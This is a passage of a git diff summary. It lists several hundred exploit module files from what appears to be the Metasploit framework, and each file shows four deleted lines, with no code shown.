---- modules/exploits/multi/http/jboss_maindeployer.rb | 4 ---- modules/exploits/multi/http/php_cgi_arg_injection.rb | 4 ---- modules/exploits/multi/http/phpldapadmin_query_engine.rb | 4 ---- modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb | 4 ---- modules/exploits/multi/http/phpscheduleit_start_date.rb | 4 ---- modules/exploits/multi/http/snortreport_exec.rb | 4 ---- modules/exploits/multi/http/spree_search_exec.rb | 4 ---- modules/exploits/multi/http/spree_searchlogic_exec.rb | 4 ---- modules/exploits/multi/http/struts_code_exec.rb | 4 ---- modules/exploits/multi/http/sun_jsws_dav_options.rb | 4 ---- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 4 ---- modules/exploits/multi/misc/java_rmi_server.rb | 4 ---- modules/exploits/multi/misc/openview_omniback_exec.rb | 4 ---- modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb | 4 ---- modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb | 4 ---- .../exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb | 4 ---- modules/exploits/multi/misc/zend_java_bridge.rb | 4 ---- modules/exploits/multi/ntp/ntp_overflow.rb | 4 ---- modules/exploits/multi/php/php_unserialize_zval_cookie.rb | 4 ---- modules/exploits/multi/realserver/describe.rb | 4 ---- modules/exploits/multi/samba/nttrans.rb | 4 ---- modules/exploits/multi/samba/usermap_script.rb | 4 ---- modules/exploits/multi/svn/svnserve_date.rb | 4 ---- modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb | 4 ---- modules/exploits/netware/smb/lsass_cifs.rb | 4 ---- modules/exploits/netware/sunrpc/pkernel_callit.rb | 4 ---- modules/exploits/osx/afp/loginext.rb | 4 ---- modules/exploits/osx/arkeia/type77.rb | 4 ---- modules/exploits/osx/browser/safari_file_policy.rb | 4 ---- modules/exploits/osx/browser/safari_metadata_archive.rb | 4 ---- modules/exploits/osx/browser/software_update.rb | 4 ---- modules/exploits/osx/email/mailapp_image_exec.rb | 4 ---- modules/exploits/osx/ftp/webstar_ftp_user.rb | 4 ---- modules/exploits/osx/http/evocam_webserver.rb | 4 ---- modules/exploits/osx/mdns/upnp_location.rb | 4 ---- modules/exploits/osx/misc/ufo_ai.rb | 4 ---- modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb | 4 ---- modules/exploits/osx/samba/lsa_transnames_heap.rb | 4 ---- modules/exploits/osx/samba/trans2open.rb | 4 ---- modules/exploits/solaris/dtspcd/heap_noir.rb | 4 ---- modules/exploits/solaris/lpd/sendmail_exec.rb | 4 ---- modules/exploits/solaris/samba/lsa_transnames_heap.rb | 4 ---- modules/exploits/solaris/samba/trans2open.rb | 4 ---- modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb | 4 ---- modules/exploits/solaris/sunrpc/sadmind_exec.rb | 4 ---- modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 4 ---- modules/exploits/solaris/telnet/fuser.rb | 4 ---- modules/exploits/solaris/telnet/ttyprompt.rb | 4 ---- modules/exploits/unix/ftp/proftpd_133c_backdoor.rb | 4 ---- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 4 ---- modules/exploits/unix/http/contentkeeperweb_mimencode.rb | 4 ---- modules/exploits/unix/http/lifesize_room.rb | 4 ---- modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb | 4 ---- modules/exploits/unix/misc/distcc_exec.rb | 4 ---- modules/exploits/unix/misc/spamassassin_exec.rb | 4 ---- modules/exploits/unix/misc/zabbix_agent_exec.rb | 4 ---- modules/exploits/unix/smtp/clamav_milter_blackhole.rb | 4 ---- modules/exploits/unix/smtp/exim4_string_format.rb | 4 ---- modules/exploits/unix/webapp/awstats_configdir_exec.rb | 4 ---- modules/exploits/unix/webapp/awstats_migrate_exec.rb | 4 ---- modules/exploits/unix/webapp/awstatstotals_multisort.rb | 4 ---- modules/exploits/unix/webapp/barracuda_img_exec.rb | 4 ---- modules/exploits/unix/webapp/base_qry_common.rb | 4 ---- modules/exploits/unix/webapp/cacti_graphimage_exec.rb | 4 ---- modules/exploits/unix/webapp/cakephp_cache_corruption.rb | 4 ---- modules/exploits/unix/webapp/citrix_access_gateway_exec.rb | 4 ---- modules/exploits/unix/webapp/coppermine_piceditor.rb | 4 ---- modules/exploits/unix/webapp/dogfood_spell_exec.rb | 4 ---- modules/exploits/unix/webapp/generic_exec.rb | 4 ---- modules/exploits/unix/webapp/google_proxystylesheet_exec.rb | 4 ---- modules/exploits/unix/webapp/guestbook_ssi_exec.rb | 4 ---- modules/exploits/unix/webapp/joomla_tinybrowser.rb | 4 ---- modules/exploits/unix/webapp/mambo_cache_lite.rb | 4 ---- modules/exploits/unix/webapp/mitel_awc_exec.rb | 4 ---- modules/exploits/unix/webapp/mybb_backdoor.rb | 4 ---- modules/exploits/unix/webapp/nagios3_statuswml_ping.rb | 4 ---- modules/exploits/unix/webapp/openview_connectednodes_exec.rb | 4 ---- modules/exploits/unix/webapp/openx_banner_edit.rb | 4 ---- modules/exploits/unix/webapp/oracle_vm_agent_utl.rb | 4 ---- modules/exploits/unix/webapp/oscommerce_filemanager.rb | 4 ---- modules/exploits/unix/webapp/pajax_remote_exec.rb | 4 ---- modules/exploits/unix/webapp/php_eval.rb | 4 ---- modules/exploits/unix/webapp/php_vbulletin_template.rb | 4 ---- modules/exploits/unix/webapp/php_wordpress_lastpost.rb | 4 ---- modules/exploits/unix/webapp/php_xmlrpc_eval.rb | 4 ---- modules/exploits/unix/webapp/phpbb_highlight.rb | 4 ---- modules/exploits/unix/webapp/phpmyadmin_config.rb | 4 ---- modules/exploits/unix/webapp/qtss_parse_xml_exec.rb | 4 ---- modules/exploits/unix/webapp/redmine_scm_exec.rb | 4 ---- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 4 ---- modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb | 4 ---- modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb | 4 ---- modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb | 4 ---- modules/exploits/unix/webapp/trixbox_langchoice.rb | 4 ---- modules/exploits/unix/webapp/twiki_history.rb | 4 ---- modules/exploits/unix/webapp/twiki_search.rb | 4 ---- modules/exploits/windows/antivirus/ams_hndlrsvc.rb | 4 ---- modules/exploits/windows/antivirus/ams_xfr.rb | 4 ---- modules/exploits/windows/antivirus/symantec_iao.rb | 4 ---- modules/exploits/windows/antivirus/symantec_rtvscan.rb | 4 ---- .../exploits/windows/antivirus/trendmicro_serverprotect.rb | 4 ---- .../antivirus/trendmicro_serverprotect_createbinding.rb | 4 ---- .../windows/antivirus/trendmicro_serverprotect_earthagent.rb | 4 ---- modules/exploits/windows/arkeia/type77.rb | 4 ---- modules/exploits/windows/backdoor/energizer_duo_payload.rb | 4 ---- modules/exploits/windows/backupexec/name_service.rb | 4 ---- modules/exploits/windows/backupexec/remote_agent.rb | 4 ---- modules/exploits/windows/brightstor/ca_arcserve_342.rb | 4 ---- modules/exploits/windows/brightstor/discovery_tcp.rb | 4 ---- modules/exploits/windows/brightstor/discovery_udp.rb | 4 ---- modules/exploits/windows/brightstor/etrust_itm_alert.rb | 4 ---- modules/exploits/windows/brightstor/hsmserver.rb | 4 ---- modules/exploits/windows/brightstor/lgserver.rb | 4 ---- modules/exploits/windows/brightstor/lgserver_multi.rb | 4 ---- modules/exploits/windows/brightstor/lgserver_rxrlogin.rb | 4 ---- .../brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb | 4 ---- .../exploits/windows/brightstor/lgserver_rxsuselicenseini.rb | 4 ---- modules/exploits/windows/brightstor/license_gcr.rb | 4 ---- modules/exploits/windows/brightstor/mediasrv_sunrpc.rb | 4 ---- modules/exploits/windows/brightstor/message_engine.rb | 4 ---- modules/exploits/windows/brightstor/message_engine_72.rb | 4 ---- modules/exploits/windows/brightstor/message_engine_heap.rb | 4 ---- modules/exploits/windows/brightstor/sql_agent.rb | 4 ---- modules/exploits/windows/brightstor/tape_engine.rb | 4 ---- modules/exploits/windows/brightstor/tape_engine_8A.rb | 4 ---- modules/exploits/windows/brightstor/universal_agent.rb | 4 ---- modules/exploits/windows/browser/adobe_cooltype_sing.rb | 4 ---- .../windows/browser/adobe_flashplayer_arrayindexing.rb | 4 ---- modules/exploits/windows/browser/adobe_flashplayer_avm.rb | 4 ---- .../exploits/windows/browser/adobe_flashplayer_flash10o.rb | 4 ---- .../exploits/windows/browser/adobe_flashplayer_newfunction.rb | 4 ---- .../exploits/windows/browser/adobe_flatedecode_predictor02.rb | 4 ---- modules/exploits/windows/browser/adobe_geticon.rb | 4 ---- modules/exploits/windows/browser/adobe_jbig2decode.rb | 4 ---- modules/exploits/windows/browser/adobe_media_newplayer.rb | 4 ---- .../windows/browser/adobe_shockwave_rcsl_corruption.rb | 4 ---- modules/exploits/windows/browser/adobe_utilprintf.rb | 4 ---- modules/exploits/windows/browser/aim_goaway.rb | 4 ---- modules/exploits/windows/browser/amaya_bdo.rb | 4 ---- modules/exploits/windows/browser/aol_ampx_convertfile.rb | 4 ---- modules/exploits/windows/browser/aol_icq_downloadagent.rb | 4 ---- modules/exploits/windows/browser/apple_itunes_playlist.rb | 4 ---- .../windows/browser/apple_quicktime_marshaled_punk.rb | 4 ---- modules/exploits/windows/browser/apple_quicktime_rtsp.rb | 4 ---- .../exploits/windows/browser/apple_quicktime_smil_debug.rb | 4 ---- modules/exploits/windows/browser/ask_shortformat.rb | 4 ---- .../exploits/windows/browser/athocgov_completeinstallation.rb | 4 ---- modules/exploits/windows/browser/autodesk_idrop.rb | 4 ---- modules/exploits/windows/browser/aventail_epi_activex.rb | 4 ---- modules/exploits/windows/browser/awingsoft_web3d_bof.rb | 4 ---- .../exploits/windows/browser/awingsoft_winds3d_sceneurl.rb | 4 ---- .../windows/browser/baofeng_storm_onbeforevideodownload.rb | 4 ---- modules/exploits/windows/browser/barcode_ax49.rb | 4 ---- .../exploits/windows/browser/blackice_downloadimagefileurl.rb | 4 ---- modules/exploits/windows/browser/ca_brightstor_addcolumn.rb | 4 ---- modules/exploits/windows/browser/chilkat_crypt_writefile.rb | 4 ---- modules/exploits/windows/browser/cisco_anyconnect_exec.rb | 4 ---- modules/exploits/windows/browser/citrix_gateway_actx.rb | 4 ---- modules/exploits/windows/browser/communicrypt_mail_activex.rb | 4 ---- .../exploits/windows/browser/creative_software_cachefolder.rb | 4 ---- modules/exploits/windows/browser/dxstudio_player_exec.rb | 4 ---- modules/exploits/windows/browser/ea_checkrequirements.rb | 4 ---- .../windows/browser/ebook_flipviewer_fviewerloading.rb | 4 ---- modules/exploits/windows/browser/enjoysapgui_comp_download.rb | 4 ---- .../exploits/windows/browser/enjoysapgui_preparetoposthtml.rb | 4 ---- modules/exploits/windows/browser/facebook_extractiptc.rb | 4 ---- modules/exploits/windows/browser/gom_openurl.rb | 4 ---- modules/exploits/windows/browser/greendam_url.rb | 4 ---- .../windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb | 4 ---- modules/exploits/windows/browser/hp_loadrunner_addfile.rb | 4 ---- modules/exploits/windows/browser/hp_loadrunner_addfolder.rb | 4 ---- modules/exploits/windows/browser/hpmqc_progcolor.rb | 4 ---- modules/exploits/windows/browser/hyleos_chemviewx_activex.rb | 4 ---- modules/exploits/windows/browser/ibmegath_getxmlvalue.rb | 4 ---- .../windows/browser/ibmlotusdomino_dwa_uploadmodule.rb | 4 ---- modules/exploits/windows/browser/ie_createobject.rb | 4 ---- modules/exploits/windows/browser/ie_iscomponentinstalled.rb | 4 ---- modules/exploits/windows/browser/ie_unsafe_scripting.rb | 4 ---- modules/exploits/windows/browser/java_basicservice_impl.rb | 4 ---- modules/exploits/windows/browser/java_codebase_trust.rb | 4 ---- modules/exploits/windows/browser/java_docbase_bof.rb | 4 ---- modules/exploits/windows/browser/java_ws_arginject_altjvm.rb | 4 ---- modules/exploits/windows/browser/java_ws_vmargs.rb | 4 ---- .../exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb | 4 ---- modules/exploits/windows/browser/kazaa_altnet_heap.rb | 4 ---- modules/exploits/windows/browser/logitechvideocall_start.rb | 4 ---- modules/exploits/windows/browser/lpviewer_url.rb | 4 ---- .../windows/browser/macrovision_downloadandexecute.rb | 4 ---- modules/exploits/windows/browser/macrovision_unsafe.rb | 4 ---- modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb | 4 ---- .../exploits/windows/browser/mcafeevisualtrace_tracetarget.rb | 4 ---- modules/exploits/windows/browser/mirc_irc_url.rb | 4 ---- modules/exploits/windows/browser/mozilla_interleaved_write.rb | 4 ---- modules/exploits/windows/browser/mozilla_mchannel.rb | 4 ---- modules/exploits/windows/browser/mozilla_nstreerange.rb | 4 ---- modules/exploits/windows/browser/mozilla_reduceright.rb | 4 ---- modules/exploits/windows/browser/ms03_020_ie_objecttype.rb | 4 ---- modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb | 4 ---- modules/exploits/windows/browser/ms06_013_createtextrange.rb | 4 ---- modules/exploits/windows/browser/ms06_055_vml_method.rb | 4 ---- modules/exploits/windows/browser/ms06_057_webview_setslice.rb | 4 ---- modules/exploits/windows/browser/ms06_067_keyframe.rb | 4 ---- modules/exploits/windows/browser/ms06_071_xml_core.rb | 4 ---- .../windows/browser/ms07_017_ani_loadimage_chunksize.rb | 4 ---- modules/exploits/windows/browser/ms08_041_snapshotviewer.rb | 4 ---- modules/exploits/windows/browser/ms08_053_mediaencoder.rb | 4 ---- .../exploits/windows/browser/ms08_070_visual_studio_msmask.rb | 4 ---- modules/exploits/windows/browser/ms08_078_xml_corruption.rb | 4 ---- .../exploits/windows/browser/ms09_002_memory_corruption.rb | 4 ---- modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb | 4 ---- modules/exploits/windows/browser/ms09_043_owc_msdso.rb | 4 ---- modules/exploits/windows/browser/ms09_072_style_object.rb | 4 ---- modules/exploits/windows/browser/ms10_002_aurora.rb | 4 ---- modules/exploits/windows/browser/ms10_018_ie_behaviors.rb | 4 ---- .../exploits/windows/browser/ms10_018_ie_tabular_activex.rb | 4 ---- .../exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb | 4 ---- .../exploits/windows/browser/ms10_026_avi_nsamplespersec.rb | 4 ---- .../exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb | 4 ---- .../windows/browser/ms10_046_shortcut_icon_dllloader.rb | 4 ---- modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 4 ---- modules/exploits/windows/browser/ms11_003_ie_css_import.rb | 4 ---- modules/exploits/windows/browser/msvidctl_mpeg2.rb | 4 ---- modules/exploits/windows/browser/mswhale_checkforupdates.rb | 4 ---- .../windows/browser/nctaudiofile2_setformatlikesample.rb | 4 ---- modules/exploits/windows/browser/nis2004_antispam.rb | 4 ---- modules/exploits/windows/browser/nis2004_get.rb | 4 ---- modules/exploits/windows/browser/novelliprint_callbackurl.rb | 4 ---- modules/exploits/windows/browser/novelliprint_datetime.rb | 4 ---- .../exploits/windows/browser/novelliprint_executerequest.rb | 4 ---- .../windows/browser/novelliprint_executerequest_dbg.rb | 4 ---- .../windows/browser/novelliprint_getdriversettings_2.rb | 4 ---- modules/exploits/windows/browser/novelliprint_target_frame.rb | 4 ---- modules/exploits/windows/browser/oracle_dc_submittoexpress.rb | 4 ---- modules/exploits/windows/browser/orbit_connecting.rb | 4 ---- modules/exploits/windows/browser/pcvue_func.rb | 4 ---- modules/exploits/windows/browser/persits_xupload_traversal.rb | 4 ---- modules/exploits/windows/browser/real_arcade_installerdlg.rb | 4 ---- modules/exploits/windows/browser/realplayer_cdda_uri.rb | 4 ---- modules/exploits/windows/browser/realplayer_console.rb | 4 ---- modules/exploits/windows/browser/realplayer_import.rb | 4 ---- modules/exploits/windows/browser/realplayer_qcp.rb | 4 ---- modules/exploits/windows/browser/realplayer_smil.rb | 4 ---- modules/exploits/windows/browser/roxio_cineplayer.rb | 4 ---- modules/exploits/windows/browser/safari_xslt_output.rb | 4 ---- .../exploits/windows/browser/sapgui_saveviewtosessionfile.rb | 4 ---- modules/exploits/windows/browser/softartisans_getdrivename.rb | 4 ---- modules/exploits/windows/browser/sonicwall_addrouteentry.rb | 4 ---- .../browser/symantec_altirisdeployment_downloadandinstall.rb | 4 ---- .../windows/browser/symantec_altirisdeployment_runcmd.rb | 4 ---- modules/exploits/windows/browser/symantec_appstream_unsafe.rb | 4 ---- .../windows/browser/symantec_backupexec_pvcalendar.rb | 4 ---- .../browser/symantec_consoleutilities_browseandsavefile.rb | 4 ---- .../exploits/windows/browser/systemrequirementslab_unsafe.rb | 4 ---- modules/exploits/windows/browser/teechart_pro.rb | 4 ---- modules/exploits/windows/browser/trendmicro_extsetowner.rb | 4 ---- modules/exploits/windows/browser/trendmicro_officescan.rb | 4 ---- modules/exploits/windows/browser/tumbleweed_filetransfer.rb | 4 ---- modules/exploits/windows/browser/ultraoffice_httpupload.rb | 4 ---- modules/exploits/windows/browser/verypdf_pdfview.rb | 4 ---- modules/exploits/windows/browser/vlc_amv.rb | 4 ---- modules/exploits/windows/browser/webdav_dll_hijacker.rb | 4 ---- modules/exploits/windows/browser/webex_ucf_newobject.rb | 4 ---- modules/exploits/windows/browser/winamp_playlist_unc.rb | 4 ---- modules/exploits/windows/browser/winamp_ultravox.rb | 4 ---- modules/exploits/windows/browser/windvd7_applicationtype.rb | 4 ---- modules/exploits/windows/browser/winzip_fileview.rb | 4 ---- modules/exploits/windows/browser/wmi_admintools.rb | 4 ---- modules/exploits/windows/browser/xmplay_asx.rb | 4 ---- modules/exploits/windows/browser/yahoomessenger_fvcom.rb | 4 ---- modules/exploits/windows/browser/yahoomessenger_server.rb | 4 ---- .../exploits/windows/browser/zenturiprogramchecker_unsafe.rb | 4 ---- modules/exploits/windows/dcerpc/ms03_026_dcom.rb | 4 ---- modules/exploits/windows/dcerpc/ms05_017_msmq.rb | 4 ---- modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb | 4 ---- modules/exploits/windows/dcerpc/ms07_065_msmq.rb | 4 ---- modules/exploits/windows/driver/broadcom_wifi_ssid.rb | 4 ---- modules/exploits/windows/driver/dlink_wifi_rates.rb | 4 ---- modules/exploits/windows/driver/netgear_wg111_beacon.rb | 4 ---- .../windows/email/ms07_017_ani_loadimage_chunksize.rb | 4 ---- modules/exploits/windows/email/ms10_045_outlook_ref_only.rb | 4 ---- .../exploits/windows/email/ms10_045_outlook_ref_resolve.rb | 4 ---- modules/exploits/windows/emc/alphastor_agent.rb | 4 ---- modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb | 4 ---- .../exploits/windows/fileformat/acdsee_fotoslate_string.rb | 4 ---- modules/exploits/windows/fileformat/acdsee_xpm.rb | 4 ---- modules/exploits/windows/fileformat/activepdf_webgrabber.rb | 4 ---- modules/exploits/windows/fileformat/adobe_collectemailinfo.rb | 4 ---- modules/exploits/windows/fileformat/adobe_cooltype_sing.rb | 4 ---- .../exploits/windows/fileformat/adobe_flashplayer_button.rb | 4 ---- .../windows/fileformat/adobe_flashplayer_newfunction.rb | 4 ---- .../windows/fileformat/adobe_flatedecode_predictor02.rb | 4 ---- modules/exploits/windows/fileformat/adobe_geticon.rb | 4 ---- .../exploits/windows/fileformat/adobe_illustrator_v14_eps.rb | 4 ---- modules/exploits/windows/fileformat/adobe_jbig2decode.rb | 4 ---- modules/exploits/windows/fileformat/adobe_libtiff.rb | 4 ---- modules/exploits/windows/fileformat/adobe_media_newplayer.rb | 4 ---- modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 4 ---- .../windows/fileformat/adobe_pdf_embedded_exe_nojs.rb | 4 ---- modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb | 4 ---- modules/exploits/windows/fileformat/adobe_utilprintf.rb | 4 ---- modules/exploits/windows/fileformat/altap_salamander_pdb.rb | 4 ---- modules/exploits/windows/fileformat/aol_desktop_linktag.rb | 4 ---- modules/exploits/windows/fileformat/aol_phobos_bof.rb | 4 ---- modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb | 4 ---- modules/exploits/windows/fileformat/audio_wkstn_pls.rb | 4 ---- modules/exploits/windows/fileformat/audiotran_pls.rb | 4 ---- modules/exploits/windows/fileformat/bacnet_csv.rb | 4 ---- modules/exploits/windows/fileformat/blazedvd_plf.rb | 4 ---- modules/exploits/windows/fileformat/ca_cab.rb | 4 ---- modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb | 4 ---- modules/exploits/windows/fileformat/cytel_studio_cy3.rb | 4 ---- modules/exploits/windows/fileformat/deepburner_path.rb | 4 ---- modules/exploits/windows/fileformat/destinymediaplayer16.rb | 4 ---- modules/exploits/windows/fileformat/digital_music_pad_pls.rb | 4 ---- modules/exploits/windows/fileformat/djvu_imageurl.rb | 4 ---- modules/exploits/windows/fileformat/dvdx_plf_bof.rb | 4 ---- .../exploits/windows/fileformat/emc_appextender_keyworks.rb | 4 ---- .../exploits/windows/fileformat/esignal_styletemplate_bof.rb | 4 ---- modules/exploits/windows/fileformat/etrust_pestscan.rb | 4 ---- modules/exploits/windows/fileformat/ezip_wizard_bof.rb | 4 ---- modules/exploits/windows/fileformat/fatplayer_wav.rb | 4 ---- modules/exploits/windows/fileformat/fdm_torrent.rb | 4 ---- modules/exploits/windows/fileformat/feeddemon_opml.rb | 4 ---- modules/exploits/windows/fileformat/foxit_reader_filewrite.rb | 4 ---- modules/exploits/windows/fileformat/foxit_title_bof.rb | 4 ---- modules/exploits/windows/fileformat/galan_fileformat_bof.rb | 4 ---- modules/exploits/windows/fileformat/gta_samp.rb | 4 ---- .../exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb | 4 ---- .../exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb | 4 ---- modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb | 4 ---- modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb | 4 ---- modules/exploits/windows/fileformat/ideal_migration_ipj.rb | 4 ---- modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb | 4 ---- modules/exploits/windows/fileformat/lotusnotes_lzh.rb | 4 ---- .../exploits/windows/fileformat/magix_musikmaker_16_mmm.rb | 4 ---- .../windows/fileformat/mcafee_hercules_deletesnapshot.rb | 4 ---- modules/exploits/windows/fileformat/mediajukebox.rb | 4 ---- modules/exploits/windows/fileformat/microp_mppl.rb | 4 ---- modules/exploits/windows/fileformat/millenium_mp3_pls.rb | 4 ---- modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb | 4 ---- modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb | 4 ---- modules/exploits/windows/fileformat/moxa_mediadbplayback.rb | 4 ---- .../exploits/windows/fileformat/ms09_067_excel_featheader.rb | 4 ---- modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb | 4 ---- .../windows/fileformat/ms10_087_rtf_pfragments_bof.rb | 4 ---- .../windows/fileformat/ms11_006_createsizeddibsection.rb | 4 ---- modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb | 4 ---- modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb | 4 ---- .../windows/fileformat/msworks_wkspictureinterface.rb | 4 ---- modules/exploits/windows/fileformat/mymp3player_m3u.rb | 4 ---- .../exploits/windows/fileformat/nuance_pdf_launch_overflow.rb | 4 ---- modules/exploits/windows/fileformat/orbital_viewer_orb.rb | 4 ---- modules/exploits/windows/fileformat/proshow_cellimage_bof.rb | 4 ---- .../exploits/windows/fileformat/real_networks_netzip_bof.rb | 4 ---- .../windows/fileformat/safenet_softremote_groupname.rb | 4 ---- modules/exploits/windows/fileformat/sascam_get.rb | 4 ---- modules/exploits/windows/fileformat/scadaphone_zip.rb | 4 ---- modules/exploits/windows/fileformat/somplplayer_m3u.rb | 4 ---- .../exploits/windows/fileformat/subtitle_processor_m3u_bof.rb | 4 ---- modules/exploits/windows/fileformat/tugzip.rb | 4 ---- modules/exploits/windows/fileformat/ultraiso_ccd.rb | 4 ---- modules/exploits/windows/fileformat/ultraiso_cue.rb | 4 ---- modules/exploits/windows/fileformat/ursoft_w32dasm.rb | 4 ---- modules/exploits/windows/fileformat/varicad_dwb.rb | 4 ---- modules/exploits/windows/fileformat/videolan_tivo.rb | 4 ---- modules/exploits/windows/fileformat/videospirit_visprj.rb | 4 ---- modules/exploits/windows/fileformat/visio_dxf_bof.rb | 4 ---- modules/exploits/windows/fileformat/visiwave_vwr_type.rb | 4 ---- modules/exploits/windows/fileformat/vlc_modplug_s3m.rb | 4 ---- modules/exploits/windows/fileformat/vlc_smb_uri.rb | 4 ---- modules/exploits/windows/fileformat/vlc_webm.rb | 4 ---- modules/exploits/windows/fileformat/vuplayer_cue.rb | 4 ---- modules/exploits/windows/fileformat/vuplayer_m3u.rb | 4 ---- modules/exploits/windows/fileformat/wireshark_packet_dect.rb | 4 ---- modules/exploits/windows/fileformat/wm_downloader_m3u.rb | 4 ---- modules/exploits/windows/fileformat/xenorate_xpl_bof.rb | 4 ---- modules/exploits/windows/fileformat/xion_m3u_sehbof.rb | 4 ---- modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb | 4 ---- modules/exploits/windows/firewall/blackice_pam_icq.rb | 4 ---- modules/exploits/windows/firewall/kerio_auth.rb | 4 ---- modules/exploits/windows/ftp/32bitftp_list_reply.rb | 4 ---- modules/exploits/windows/ftp/3cdaemon_ftp_user.rb | 4 ---- modules/exploits/windows/ftp/aasync_list_reply.rb | 4 ---- modules/exploits/windows/ftp/cesarftp_mkd.rb | 4 ---- modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb | 4 ---- modules/exploits/windows/ftp/dreamftp_format.rb | 4 ---- modules/exploits/windows/ftp/easyfilesharing_pass.rb | 4 ---- modules/exploits/windows/ftp/easyftp_cwd_fixret.rb | 4 ---- modules/exploits/windows/ftp/easyftp_list_fixret.rb | 4 ---- modules/exploits/windows/ftp/easyftp_mkd_fixret.rb | 4 ---- modules/exploits/windows/ftp/filecopa_list_overflow.rb | 4 ---- modules/exploits/windows/ftp/filewrangler_list_reply.rb | 4 ---- modules/exploits/windows/ftp/freeftpd_user.rb | 4 ---- modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb | 4 ---- modules/exploits/windows/ftp/ftppad_list_reply.rb | 4 ---- modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb | 4 ---- modules/exploits/windows/ftp/ftpsynch_list_reply.rb | 4 ---- modules/exploits/windows/ftp/gekkomgr_list_reply.rb | 4 ---- modules/exploits/windows/ftp/globalscapeftp_input.rb | 4 ---- modules/exploits/windows/ftp/goldenftp_pass_bof.rb | 4 ---- modules/exploits/windows/ftp/httpdx_tolog_format.rb | 4 ---- modules/exploits/windows/ftp/leapftp_list_reply.rb | 4 ---- modules/exploits/windows/ftp/leapftp_pasv_reply.rb | 4 ---- modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb | 4 ---- modules/exploits/windows/ftp/netterm_netftpd_user.rb | 4 ---- modules/exploits/windows/ftp/odin_list_reply.rb | 4 ---- modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb | 4 ---- modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb | 4 ---- modules/exploits/windows/ftp/proftp_banner.rb | 4 ---- modules/exploits/windows/ftp/sami_ftpd_user.rb | 4 ---- modules/exploits/windows/ftp/sasser_ftpd_port.rb | 4 ---- modules/exploits/windows/ftp/scriptftp_list.rb | 4 ---- modules/exploits/windows/ftp/seagull_list_reply.rb | 4 ---- modules/exploits/windows/ftp/servu_chmod.rb | 4 ---- modules/exploits/windows/ftp/servu_mdtm.rb | 4 ---- modules/exploits/windows/ftp/slimftpd_list_concat.rb | 4 ---- modules/exploits/windows/ftp/trellian_client_pasv.rb | 4 ---- modules/exploits/windows/ftp/vermillion_ftpd_port.rb | 4 ---- modules/exploits/windows/ftp/warftpd_165_pass.rb | 4 ---- modules/exploits/windows/ftp/warftpd_165_user.rb | 4 ---- modules/exploits/windows/ftp/wftpd_size.rb | 4 ---- modules/exploits/windows/ftp/wsftp_server_503_mkd.rb | 4 ---- modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb | 4 ---- modules/exploits/windows/ftp/xftp_client_pwd.rb | 4 ---- modules/exploits/windows/ftp/xlink_client.rb | 4 ---- modules/exploits/windows/ftp/xlink_server.rb | 4 ---- modules/exploits/windows/games/mohaa_getinfo.rb | 4 ---- modules/exploits/windows/games/racer_503beta5.rb | 4 ---- modules/exploits/windows/games/ut2004_secure.rb | 4 ---- modules/exploits/windows/http/adobe_robohelper_authbypass.rb | 4 ---- modules/exploits/windows/http/altn_securitygateway.rb | 4 ---- modules/exploits/windows/http/altn_webadmin.rb | 4 ---- modules/exploits/windows/http/amlibweb_webquerydll_app.rb | 4 ---- modules/exploits/windows/http/apache_chunked.rb | 4 ---- modules/exploits/windows/http/apache_mod_rewrite_ldap.rb | 4 ---- modules/exploits/windows/http/apache_modjk_overflow.rb | 4 ---- modules/exploits/windows/http/badblue_ext_overflow.rb | 4 ---- modules/exploits/windows/http/badblue_passthru.rb | 4 ---- modules/exploits/windows/http/bea_weblogic_jsessionid.rb | 4 ---- .../exploits/windows/http/bea_weblogic_transfer_encoding.rb | 4 ---- modules/exploits/windows/http/belkin_bulldog.rb | 4 ---- modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb | 4 ---- modules/exploits/windows/http/ca_igateway_debug.rb | 4 ---- .../windows/http/ca_totaldefense_regeneratereports.rb | 4 ---- modules/exploits/windows/http/coldfusion_fckeditor.rb | 4 ---- modules/exploits/windows/http/easyftp_list.rb | 4 ---- modules/exploits/windows/http/edirectory_host.rb | 4 ---- 